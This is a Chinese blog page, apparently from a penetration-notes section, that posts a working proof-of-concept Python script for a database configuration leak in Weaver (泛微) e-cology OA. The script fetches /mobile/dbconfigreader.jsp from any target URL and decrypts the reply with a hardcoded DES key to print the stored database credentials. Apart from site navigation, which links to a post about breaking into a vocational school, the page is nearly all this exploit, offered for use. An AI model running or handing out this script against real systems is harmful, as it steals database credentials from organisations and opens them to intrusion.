泛微OA数据库配置信息泄漏 POC

释放双眼,带上耳机,听听看~!
    # -*- coding:utf-8 -*-
    #Author:print("")
    import pyDes,requests
    import sys
    def desdecode(secret_key,s):
        cipherX = pyDes.des('        ')
        cipherX.setKey(secret_key)
        y = cipherX.decrypt(s)
        return y
    default_headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'
    }
    def send(url):
        data = requests.get(url='%s/mobile/dbconfigreader.jsp'%url).content
        return (desdecode('1z2x3c4v5b6n', data.strip()))
     
    if __name__ == '__main__':
        url = sys.argv[1]
        print('泛微e-cology OA 数据库配置信息泄漏漏洞')
        print('url--->%s'%url)     print('数据库信息如下----->:%s'%send(url))

泛微OA数据库配置信息泄漏 POC-路人娱乐网

人已赞赏
渗透笔记

【渗透笔记】实战入侵某职业中学

2020-10-30 13:00:42

论天地

关于我发的技术类文章版权声明.

2020-11-7 19:07:06

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索